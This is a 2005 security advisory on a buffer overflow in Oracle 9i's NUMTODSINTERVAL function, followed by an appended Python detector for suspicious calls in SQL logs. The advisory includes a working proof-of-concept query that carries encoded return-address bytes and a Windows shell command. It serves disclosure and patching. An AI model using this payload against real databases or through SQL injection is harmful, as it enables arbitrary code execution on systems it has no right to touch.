Red-Database-Security GmbH is specialized in Oracle Security

Buffer Overflow in NUMTODSINTERVAL in Oracle 9i

Name: Buffer Overflow Oracle NUMTODSINTERVAL in Oracle 9i (up to 9.2.0.3)
Systems Affected: Oracle 9i
Severity: High Risk
Category: Buffer Overflow
Vendor URL: http://www.oracle.com/
Credit: Cesar Cerrudo (<argeniss>dot<com>) / Mark Litchfield (<mark at ngssoftware.com>)
Exploit: http://lists.grok.org.uk/pipermail/full-disclosure/2004-February/016789.html
Exploit: http://www.ngssoftware.com/advisories/ora_numtodsinterval.txt
Date: 14 May 2005 (V 1.00)

Details

Buffer overflow in NUMTODSINTERVAL. Every database user can exploit this vulnerability and execute arbitrary code. This vulnerability can also be exploited via SQL injection.



Example
SELECT NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'||chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||
chr(148)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo ARE YOU SURE? >c:\Unbreakable.txt')
FROM DUAL;




Patch Information
Apply Oracle patchset 9.2.0.4 or later.
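
Detection example (added here, not part of the original advisory): the overflow is reached through the second argument of NUMTODSINTERVAL, so captured SQL text (audit trail, application or proxy logs) can be screened for calls whose unit is anything other than a plain 'DAY', 'HOUR', 'MINUTE' or 'SECOND' literal. The function names and sample statements are hypothetical; a bind variable used as the unit is also reported and needs manual review.

```python
import re

# Units Oracle accepts for NUMTODSINTERVAL's second argument (case-insensitive).
VALID_UNITS = {"DAY", "HOUR", "MINUTE", "SECOND"}
CALL = re.compile(r"\bNUMTODSINTERVAL\s*\(", re.IGNORECASE)

def split_args(sql, i):
    """Split call arguments from just after '('; honours nesting and '' escapes."""
    args, buf, depth, in_str = [], [], 0, False
    while i < len(sql):
        c = sql[i]
        if in_str:
            if c == "'" and sql[i + 1:i + 2] == "'":
                buf.append(c)          # first half of an escaped quote
                i += 1
            elif c == "'":
                in_str = False
        elif c == "'":
            in_str = True
        elif c == ")" and depth == 0:
            return args + ["".join(buf).strip()]
        elif c in "()":
            depth += 1 if c == "(" else -1
        elif c == "," and depth == 0:
            args.append("".join(buf).strip())
            buf, c = [], ""            # start the next argument, drop the comma
        buf.append(c)
        i += 1
    return None                        # call never closed

def suspicious_calls(sql):
    """Return (offset, reason) for each call whose unit is not a valid plain literal."""
    findings = []
    for m in CALL.finditer(sql):
        args = split_args(sql, m.end())
        if args is None or len(args) != 2:
            findings.append((m.start(), "malformed call"))
        elif (lit := re.fullmatch(r"'([^']*)'", args[1])) is None:
            findings.append((m.start(), "unit is an expression"))
        elif lit.group(1).strip().upper() not in VALID_UNITS:
            findings.append((m.start(), f"invalid unit literal ({len(lit.group(1))} chars)"))
    return findings

# Constructed sample statements (not taken from any real log).
SAMPLES = ["SELECT NUMTODSINTERVAL(ROUND(x, 2), 'hour') FROM t",
           "SELECT NUMTODSINTERVAL(1, 'AAAAAAAAAAAAAAAAAAAAAAAA'||chr(65)) FROM DUAL"]
if __name__ == "__main__":
    for s in SAMPLES:
        print(suspicious_calls(s), "<-", s)
```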



2005 by Red-Database-Security GmbH - last update 02-nov-2005

Definition Exploit
"Exploit" is a common term in computer security for a piece of software that takes advantage of a bug or vulnerability, leading to privilege escalation or denial of service (d.o.s.) on a computer system.
Computer security experts use exploit code to test whether a patch is working properly.